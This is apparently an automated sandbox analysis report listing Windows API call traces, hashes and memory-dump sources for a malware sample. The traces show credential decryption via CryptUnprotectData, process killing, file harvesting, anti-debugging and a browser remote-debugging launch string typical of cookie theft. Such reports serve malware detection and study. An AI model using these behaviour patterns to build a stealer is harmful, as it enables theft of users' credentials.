                                                      • API ID: lstrcatlstrcpy$Process32memset$CloseProcess$CreateHandleNextstrlen$DesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                                      • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                                      • API String ID: 67568813-1862457068
                                                      • Opcode ID: 0471f81c6efc9c7983f7f40d4f8ded86c8947c8730b0baf7d3319f74423e4b83
                                                      • Instruction ID: 38294f6e3b9bd2ecfb08d4d5c5f9e290344656206d8fb24d244d478861931029
                                                      • Opcode Fuzzy Hash: 0471f81c6efc9c7983f7f40d4f8ded86c8947c8730b0baf7d3319f74423e4b83
                                                      • Instruction Fuzzy Hash: 15916371A10218AFDB10DFA4DC89FDE77B9AF48700F504169F609A72D1DFB4AA448FA4
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81648
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8166B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81676
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C81681
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8169E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C816AA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C816D5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C816F1
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C81713
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8172D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81766
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8178E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81799
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C817A4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817C1
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C817CD
                                                      • lstrlen.KERNEL32(?), ref: 02C817DA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817FA
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C81808
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81831
                                                      • StrCmpCA.SHLWAPI(?,00638C28), ref: 02C8185A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8189B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C818C4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C818EC
                                                      • StrCmpCA.SHLWAPI(?,006388A8), ref: 02C81909
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8194A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81973
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8199B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81B4D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81B75
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81BAC
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C81BD3
                                                      • FindClose.KERNEL32(00000000), ref: 02C81BE2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 1346933759-0
                                                      • Opcode ID: 0c6600d1548fdf9b6c169be3acf959fa0fb73bd41b803abdc6cd5abb21d52613
                                                      • Instruction ID: 2bc50a10db90ff70bec6b7dcecce82fbb897afafb494438348e9861117706394
                                                      • Opcode Fuzzy Hash: 0c6600d1548fdf9b6c169be3acf959fa0fb73bd41b803abdc6cd5abb21d52613
                                                      • Instruction Fuzzy Hash: D8C19670A006469BDB10FF74DD89AAE7BF6EF44308F088528EC49A7250EB74D945DFA1
                                                      APIs
                                                      • wsprintfA.USER32 ref: 02C8D053
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02C8D06A
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8D0B6
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C8D0C8
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8D0E2
                                                      • wsprintfA.USER32 ref: 02C8D107
                                                      • PathMatchSpecA.SHLWAPI(?,00638D64), ref: 02C8D139
                                                      • CoInitialize.OLE32(00000000), ref: 02C8D145
                                                        • Part of subcall function 02C8CF37: CoCreateInstance.COMBASE(0042B118,00000000,00000001,0042B108,?), ref: 02C8CF5D
                                                        • Part of subcall function 02C8CF37: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 02C8CF9D
                                                        • Part of subcall function 02C8CF37: lstrcpyn.KERNEL32(?,?,00000104), ref: 02C8D020
                                                      • CoUninitialize.COMBASE ref: 02C8D160
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8D185
                                                      • lstrlen.KERNEL32(?), ref: 02C8D192
                                                      • StrCmpCA.SHLWAPI(?,0042CFF4), ref: 02C8D1AC
                                                      • wsprintfA.USER32 ref: 02C8D1D4
                                                      • wsprintfA.USER32 ref: 02C8D1F3
                                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 02C8D207
                                                      • wsprintfA.USER32 ref: 02C8D22F
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 02C8D248
                                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02C8D267
                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 02C8D27F
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C8D28A
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C8D296
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C8D2AB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8D2EB
                                                      • FindNextFileA.KERNEL32(?,?), ref: 02C8D3E4
                                                      • FindClose.KERNEL32(?), ref: 02C8D3F6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                                      • String ID:
                                                      • API String ID: 3860919712-0
                                                      • Opcode ID: 626ef74eb132f672f768666b2d2120955f45bb4ea48423338616a340fb27b7de
                                                      • Instruction ID: e991d520387ef08d72122a93baef1d155e5c6e6e2c2de7aa8d65d3ba40866c3b
                                                      • Opcode Fuzzy Hash: 626ef74eb132f672f768666b2d2120955f45bb4ea48423338616a340fb27b7de
                                                      • Instruction Fuzzy Hash: AAC151759002199FDB14EF64DC44FEE777AEF88304F048599F90AA7190EB74AA84CFA1
                                                      APIs
                                                      • wsprintfA.USER32 ref: 02C8E673
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02C8E68A
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C8E6AA
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8E6C4
                                                      • wsprintfA.USER32 ref: 02C8E6E9
                                                      • StrCmpCA.SHLWAPI(?,0042CFF4), ref: 02C8E6FB
                                                      • wsprintfA.USER32 ref: 02C8E718
                                                        • Part of subcall function 02C8F227: lstrcpy.KERNEL32(00000000,?), ref: 02C8F259
                                                      • wsprintfA.USER32 ref: 02C8E737
                                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 02C8E74B
                                                      • lstrcat.KERNEL32(?,00638D24), ref: 02C8E77C
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8E78E
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E79F
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8E7B1
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E7C5
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 02C8E7DB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E819
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E869
                                                      • DeleteFileA.KERNEL32(?), ref: 02C8E8A3
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C8E8E2
                                                      • FindClose.KERNEL32(00000000), ref: 02C8E8F1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                      • String ID:
                                                      • API String ID: 1375681507-0
                                                      • Opcode ID: 04a500ee45e0d5bd7b26600a9f1f28492467701008bf874d16c24c22c0a22dc1
                                                      • Instruction ID: efaf9c29a53cb8e2efaff24e093ddfee327bd535c68732cf480c777fc452ffdc
                                                      • Opcode Fuzzy Hash: 04a500ee45e0d5bd7b26600a9f1f28492467701008bf874d16c24c22c0a22dc1
                                                      • Instruction Fuzzy Hash: 6F816EB19002199FDB10EF64DC49EEE77BAFF88304F048599B90997150EB75AB48CFA1
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004248C9
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004248D9
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004248EB
                                                      • StrCmpCA.SHLWAPI(?,?), ref: 004248FD
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424912
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424921
                                                      • CloseHandle.KERNEL32(00000000), ref: 00424928
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00424936
                                                      • CloseHandle.KERNEL32(00000000), ref: 00424941
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction ID: 956b9cb34166e2898696d065da2ac792d61c713baa536d295fc307e1a52bb286
                                                      • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction Fuzzy Hash: 44016D71601224ABE7215B70EC89FFB377DEB88B51F00119DF90596290EFB899848EB5
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C94B30
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C94B40
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94B52
                                                      • StrCmpCA.SHLWAPI(?,?), ref: 02C94B64
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02C94B79
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 02C94B88
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94B8F
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94B9D
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94BA8
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction ID: 007e8e29a340b3770d821025a013c6f186548b2d112943fa1880aa65dfd77049
                                                      • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction Fuzzy Hash: 7401AD32601214ABEB245B60DC8CFFA377EEB88B51F00018CF90592180EFB49A818EB1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84F18
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F3B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84F46
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C84F51
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F6E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C84F7A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84FA5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C84FC1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2567437900-0
                                                      • Opcode ID: a53eb7fe87ab6b69505aac4e885880b6fc62019f0cf0bde301dc556118b80bc4
                                                      • Instruction ID: 01db69f0a9e0046a2046bc92ea9db2ded21bd4eae32991fcfbffff87ae0d6d0d
                                                      • Opcode Fuzzy Hash: a53eb7fe87ab6b69505aac4e885880b6fc62019f0cf0bde301dc556118b80bc4
                                                      • Instruction Fuzzy Hash: 12317A71100A969BDB20FF29DC85E9E77A6EF90308F008128FC0497650EB75A945EF92
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 02C94A9F
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C94AAF
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94AC1
                                                      • StrCmpCA.SHLWAPI(?,00435084), ref: 02C94AD7
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94AE9
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94AF4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 2284531361-0
                                                      • Opcode ID: 0a4584e588e2a1bd53d0dc5be3f63ae9425af6167d0c2907f6cf8e63ec5e0e21
                                                      • Instruction ID: 3bd768c5fca807ec490ac578a577b850f746e1cbddf07a5c3493adefd5f4a840
                                                      • Opcode Fuzzy Hash: 0a4584e588e2a1bd53d0dc5be3f63ae9425af6167d0c2907f6cf8e63ec5e0e21
                                                      • Instruction Fuzzy Hash: 7D01A2316012249BDB249B20EC89FEA77BDEF48751F0401D9F908D2040EFB48A958FF5
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 02C98879
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C9888E
                                                      • UnhandledExceptionFilter.KERNEL32(0042C298), ref: 02C98899
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 02C988B5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 02C988BC
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 2579439406-0
                                                      • Opcode ID: 81133d0f59986b58adb243c707ef71d8ad7c18327483a8e6b33276d8b1410e24
                                                      • Instruction ID: c9f9f94af2974d512c63093860eeb90d5c701b853fd4b42bad70b3a4e274b099
                                                      • Opcode Fuzzy Hash: 81133d0f59986b58adb243c707ef71d8ad7c18327483a8e6b33276d8b1410e24
                                                      • Instruction Fuzzy Hash: 9621DEB5900306DFCB60DF15F988A48BBB4FB28304F50616EF81887762EBB065858F5C
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00407765
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                                                      • LocalFree.KERNEL32(?), ref: 004077B7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                      • String ID:
                                                      • API String ID: 3657800372-0
                                                      • Opcode ID: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
                                                      • Instruction ID: 7fa361070e6919b9c387aeb0df070321f657dace02b2a1325b51809b71c78810
                                                      • Opcode Fuzzy Hash: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
                                                      • Instruction Fuzzy Hash: F7011275B443187BEB14DB949C4AFAA7B79EB44B15F104159FA05EB2C0D6F0A9008BE4
                                                      APIs
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004242DD
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004242EC
                                                      • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004242F3
                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00424323
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptHeapString$AllocProcess
                                                      • String ID:
                                                      • API String ID: 3939037734-0
                                                      • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction ID: 9713ce4537880be7ab514a821b153c94c7b12f34070f0629a2b55f5b2daa99c3
                                                      • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                      • Instruction Fuzzy Hash: B8015A70600215ABDB108FA5EC89BABBBADEF88311F108199BD09C7340DA7099408BA4
                                                      APIs
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B9F
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409BB3
                                                      • memcpy.MSVCRT(00000000,?), ref: 00409BCA
                                                      • LocalFree.KERNEL32(?), ref: 00409BD7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                      • String ID:
                                                      • API String ID: 3243516280-0
                                                      • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction ID: a8d62dfbe6203375accfd57a9289b477ef975779ddea21d9cd908cb540d9be87
                                                      • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                      • Instruction Fuzzy Hash: 3101FB75A41309ABD7109BA4DC45BABB779EB44700F104169FA04AB381EBB4AE008BE5
                                                      APIs
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B3B
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B4A
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B61
                                                      • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B70
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                      • String ID:
                                                      • API String ID: 4291131564-0
                                                      • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction ID: fdb19b52b522e7fb6258fb386c859728d3eb4189d8c812c623f7d3b132898295
                                                      • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                                                      • Instruction Fuzzy Hash: 89F0BD703443126BE7305F65AC49F577BA9EF04B61F240515FA45EA2D0D7B49C40CAA4
                                                      APIs
                                                      • CoCreateInstance.COMBASE(0042B118,00000000,00000001,0042B108,?), ref: 02C8CF5D
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 02C8CF9D
                                                      • lstrcpyn.KERNEL32(?,?,00000104), ref: 02C8D020
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                                      • String ID:
                                                      • API String ID: 1940255200-0
                                                      • Opcode ID: 6b054bc3ed76e03b3c8d476564611060be1a67b8d02412b6fca3c0074aada483
                                                      • Instruction ID: 3160de827f47e2a0893a69c659da295a8327c283496104d502765f880b26e13c
                                                      • Opcode Fuzzy Hash: 6b054bc3ed76e03b3c8d476564611060be1a67b8d02412b6fca3c0074aada483
                                                      • Instruction Fuzzy Hash: EE318271A40614AFD710DB94CC81FA9B7B9DB88B15F108188FA05EB2D0D7B1AE45CBE0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be4a19ca30413338a7960560cfbf2d2ce858cfbfdcce81e9b17ed433251d2760
                                                      • Instruction ID: d93ca8b695642c8b64c53f385afd2a1d514bdb1d2bfe4a9c5acecd660c3378c1
                                                      • Opcode Fuzzy Hash: be4a19ca30413338a7960560cfbf2d2ce858cfbfdcce81e9b17ed433251d2760
                                                      • Instruction Fuzzy Hash: C9119135B046249FCB20CF9DE8909A9B3F9FB8471871501AAD845D7751DB71EA41CB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                      • Instruction ID: c4df72a5f1579038dea29de44ee5229cbed5559608dd9130deecf6c80eb9d882
                                                      • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                      • Instruction Fuzzy Hash: C771C5B2432B049BEF633B31DD49B49F6A37F48B00F194D24A1D6217749B236869BF51
                                                      APIs
                                                      • lstrcpy.KERNEL32(?), ref: 02C88A51
                                                        • Part of subcall function 02C944B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 02C944E4
                                                        • Part of subcall function 02C944B7: lstrcpy.KERNEL32(00000000,?), ref: 02C94519
                                                      • StrStrA.SHLWAPI(?,00638C08), ref: 02C88A76
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88A95
                                                      • lstrlen.KERNEL32(?), ref: 02C88AA8
                                                      • wsprintfA.USER32 ref: 02C88AB8
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88ACE
                                                      • StrStrA.SHLWAPI(?,00638C94), ref: 02C88AFB
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88B22
                                                      • lstrlen.KERNEL32(?), ref: 02C88B35
                                                      • wsprintfA.USER32 ref: 02C88B45
                                                      • lstrcpy.KERNEL32(?,006393D0), ref: 02C88B5B
                                                      • StrStrA.SHLWAPI(?,00638C5C), ref: 02C88B88
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88BA7
                                                      • lstrlen.KERNEL32(?), ref: 02C88BBA
                                                      • wsprintfA.USER32 ref: 02C88BCA
                                                      • lstrcpy.KERNEL32(?,?), ref: 02C88BE0
                                                      • StrStrA.SHLWAPI(?,00638ABC), ref: 02C88C0D
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02C88C2C
                                                      • lstrlen.KERNEL32(?), ref: 02C88C3F
                                                      • wsprintfA.USER32 ref: 02C88C4F
